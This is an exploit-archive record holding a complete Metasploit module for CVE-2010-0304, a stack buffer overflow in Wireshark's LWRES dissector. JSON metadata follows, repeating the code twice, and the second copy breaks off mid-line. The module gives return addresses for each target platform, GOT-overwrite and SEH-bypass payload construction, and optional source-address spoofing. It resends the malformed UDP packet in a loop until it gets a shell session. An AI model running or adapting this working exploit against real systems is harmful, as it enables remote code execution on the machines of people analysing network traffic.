ID 1337DAY-ID-10865 Type zdt Reporter babi Modified 2010-02-12T00:00:00
Description
Exploit for unknown platform in category remote exploits
=======================================================================
Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
=======================================================================
##
# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'racket'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',
'Description' => %q{
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
overflow. This bug found and reported by babi.
This particular exploit targets the dissect_getaddrsbyname_request function. Several
other functions also contain potentially exploitable stack-based buffer overflows.
The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
exploitation via the return address on the stack. Sending a larger string allows
exploitation using the SEH bypass method. However, this packet will usually get
fragmented, which may cause additional complications.
NOTE: The vulnerable code is reached only when the packet dissection is rendered.
If the packet is fragmented, all fragments must be captured and reassembled to
exploit this issue.
This version loops, sending the packet every X seconds until the job is killed.
},
'Author' =>
[
'babi', # original discovery/exploit
'jduck', # ported from public exploit
'redsand' # windows target/testing
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8364 $',
'References' =>
[
[ 'CVE', '2010-0304' ],
[ 'OSVDB', '61987' ],
[ 'BID', '37985' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],
[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true, # at least capture privilege
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
'DisableNops' => true,
},
'DefaultTarget' => 4,
'Targets' =>
[
[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
# breakpoint: lwres.so + 0x2ce2
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# conveniently, edx pointed at our string..
# and so, we write it to g_slist_append's GOT entry just before its called.
# pwnt.
#
# mov [ebx+0xc],edx / jmp 0x804fc40 -->
# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append
#
'Ret' => 0x804fc85, # see above..
'RetOff' => 376,
'Readable' => 0x804fa04, # just anything
'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append
}
],
[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
# the method for tshark doesn't work, since there aren't any convenient
# pointers lying around (in reg/close on stack)
#
# since the wireshark bin has a jmp esp, we'll just use that method..
'Ret' => 0x818fce8, # jmp esp in wireshark bin
'RetOff' => 376,
'Readable' => 0x8066a40, # just any old readable addr (unused)
'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)
}
],
[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',
{
'Arch' => ARCH_X86_64,
'Platform' => 'linux',
'Ret' => 0xfeedfed5deadbeef,
'RetOff' => 152,
}
],
[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'osx',
'Ret' => 0xdeadbeef,
'RetOff' => 268,
}
],
# The following target was tested against Windows XP SP3 and Windows Vista
[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
# NOTE: due to the length of this packet, your mileage may vary.
'Ret' => 0x61B4121B,
# 0x655810b6 = pop/pop/ret in libpango
# 0x02A110B6 = pop/pop/ret in libgtk-w
# 0x03D710CC = pop/mov/pop/ret in packet
# 0x61B4121B = pop/pop/ret in pcre3
'RetOff' => 2128,
}
],
],
'DisclosureDate' => 'Jan 27 2010',
# Set it to passive mode to background it.
'Stance' => Msf::Exploit::Stance::Passive))
register_options([
Opt::RPORT(921),
Opt::RHOST("239.255.255.250"),
OptAddress.new( 'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
OptInt.new( 'DELAY', [true, 'This option sets the delay between sent packets', 5])
], self.class)
register_advanced_options([
OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
], self.class)
deregister_options('FILTER','PCAPFILE')
end
def exploit
ret_offset = target['RetOff']
# we have different techniques depending on the target
if (target == targets[0])
# debian tshark
str = make_nops(ret_offset - payload.encoded.length - 16)
str << payload.encoded
str << [target['GotAddr'] - 0xc].pack('V')
str << rand_text(4)
str << [target['Readable']].pack('V')
str << rand_text(4)
# ret is next
elsif (target == targets[1])
fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
str << fix_esp
str << payload.encoded
# jmp esp...
str << [target.ret].pack('V')
# jump back
distance = ret_offset + 4
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
elsif (target == targets[4])
# ugh, /GS and UDP length issues :-/
str = make_nops(ret_offset - payload.encoded.length)
str << payload.encoded
str << generate_seh_record(target.ret)
# jump back
distance = ret_offset + 8
str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
else
# this is just a simple DoS payload
str = Rex::Text.pattern_create(ret_offset)
#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+6").encode_string
end
# add return address
#XXX: this isn't working?
#str << Rex::Arch.pack_addr(target.arch, target.ret)
str << [target.ret].pack('V')
# form the packet's payload!
sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
sploit << "\x00\x00\x00\x01"
sploit << [str.length].pack('n')
sploit << str
sploit << "\x00\x00"
shost = datastore['SHOST']
if (shost)
print_status("Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})")
open_pcap
n = Racket::Racket.new
n.l3 = Racket::L3::IPv4.new
n.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)
n.l3.dst_ip = rhost
n.l3.protocol = 6
n.l3.id = rand(0x10000)
n.l3.ttl = 64
n.l4 = Racket::L4::UDP.new
n.l4.src_port = rand((2**16)-1024)+1024
n.l4.dst_port = datastore['RPORT'].to_i
n.l4.payload = sploit
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
pkt = n.pack
while true
break if session_created? and datastore['ExitOnSession']
capture_sendto(pkt, rhost)
sleep(datastore['DELAY'])
end
close_pcap
handler
else
print_status("Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.")
handler
while true
break if session_created? and datastore['ExitOnSession']
connect_udp
udp_sock.put(sploit)
disconnect_udp
sleep(datastore['DELAY'])
end
end
end
end
# 0day.today [2018-02-06] #
{"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:01:02", "bulletin": {"published": "2010-02-12T00:00:00", "id": "1337DAY-ID-10865", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.3, "modified": "2016-04-20T01:01:02"}}, "hash": "eb2d778b951aaede91dcc90f5e58a783588582e9295fbe57a1c4beb7cab16e63", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T01:01:02", "edition": 1, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "http://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx / jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif (target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "484c67b3fd6e747e569de85354c053d3", "key": "sourceData"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "907795d030ce45a1a44e6f3fc3f2b888", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "2c638333d43ee1d828de3652ea30ae2b", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "8106bfb42c139f6c6e6363bcf44fc8bcc6f6015ae98af27f6446c5cbe9d61a76", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-02-06T05:08:19"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-2128", "1337DAY-ID-8364"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10865", "SECURITYVULNS:VULN:5537"]}], "modified": "2018-02-06T05:08:19"}, "vulnersScore": 0.5}, "type": "zdt", "lastseen": "2018-02-06T05:08:19", "edition": 2, "title": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow", "href": "https://0day.today/exploit/description/10865", "modified": "2010-02-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/10865", "references": [], "reporter": "babi", "sourceData": "=======================================================================\r\nWireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)\r\n=======================================================================\r\n\r\n##\r\n# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n#require 'racket'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThe LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\r\n\t\t\t\t1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\r\n\t\t\t\toverflow. This bug found and reported by babi.\r\n\r\n\t\t\t\tThis particular exploit targets the dissect_getaddrsbyname_request function. Several\r\n\t\t\t\tother functions also contain potentially exploitable stack-based buffer overflows.\r\n\r\n\t\t\t\tThe Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\r\n\t\t\t\texploitation via the return address on the stack. Sending a larger string allows\r\n\t\t\t\texploitation using the SEH bypass method. However, this packet will usually get\r\n\t\t\t\tfragmented, which may cause additional complications.\r\n\r\n\t\t\t\tNOTE: The vulnerable code is reached only when the packet dissection is rendered.\r\n\t\t\t\tIf the packet is fragmented, all fragments must be captured and reassembled to\r\n\t\t\t\texploit this issue.\r\n\r\n\t\t\t\tThis version loops, sending the packet every X seconds until the job is killed.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'babi', # original discovery/exploit\r\n\t\t\t\t\t'jduck', # ported from public exploit\r\n\t\t\t\t\t'redsand' # windows target/testing\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 8364 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0304' ],\r\n\t\t\t\t\t[ 'OSVDB', '61987' ],\r\n\t\t\t\t\t[ 'BID', '37985' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged'\t=> true, # at least capture privilege\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'DefaultTarget'\t=> 4,\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t# breakpoint: lwres.so + 0x2ce2\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# conveniently, edx pointed at our string..\r\n\t\t\t\t\t\t\t# and so, we write it to g_slist_append's GOT entry just before its called.\r\n\t\t\t\t\t\t\t# pwnt.\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# mov [ebx+0xc],edx / jmp 0x804fc40 -->\r\n\t\t\t\t\t\t\t# mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t'Ret' => 0x804fc85, # see above..\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x804fa04, # just anything\r\n\t\t\t\t\t\t\t'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t# the method for tshark doesn't work, since there aren't any convenient\r\n\t\t\t\t\t\t\t# pointers lying around (in reg/close on stack)\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# since the wireshark bin has a jmp esp, we'll just use that method..\r\n\t\t\t\t\t\t\t'Ret' => 0x818fce8, # jmp esp in wireshark bin\r\n\t\t\t\t\t\t\t'RetOff' => 376,\r\n\t\t\t\t\t\t\t'Readable' => 0x8066a40, # just any old readable addr (unused)\r\n\t\t\t\t\t\t\t'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on RHEL 5.4 (x64)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86_64,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Ret' => 0xfeedfed5deadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 152,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Ret' => 0xdeadbeef,\r\n\t\t\t\t\t\t\t'RetOff' => 268,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# The following target was tested against Windows XP SP3 and Windows Vista\r\n\t\t\t\t\t[ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t# NOTE: due to the length of this packet, your mileage may vary.\r\n\t\t\t\t\t\t\t'Ret' => 0x61B4121B,\r\n\t\t\t\t\t\t\t# 0x655810b6 = pop/pop/ret in libpango\r\n\t\t\t\t\t\t\t# 0x02A110B6 = pop/pop/ret in libgtk-w\r\n\t\t\t\t\t\t\t# 0x03D710CC = 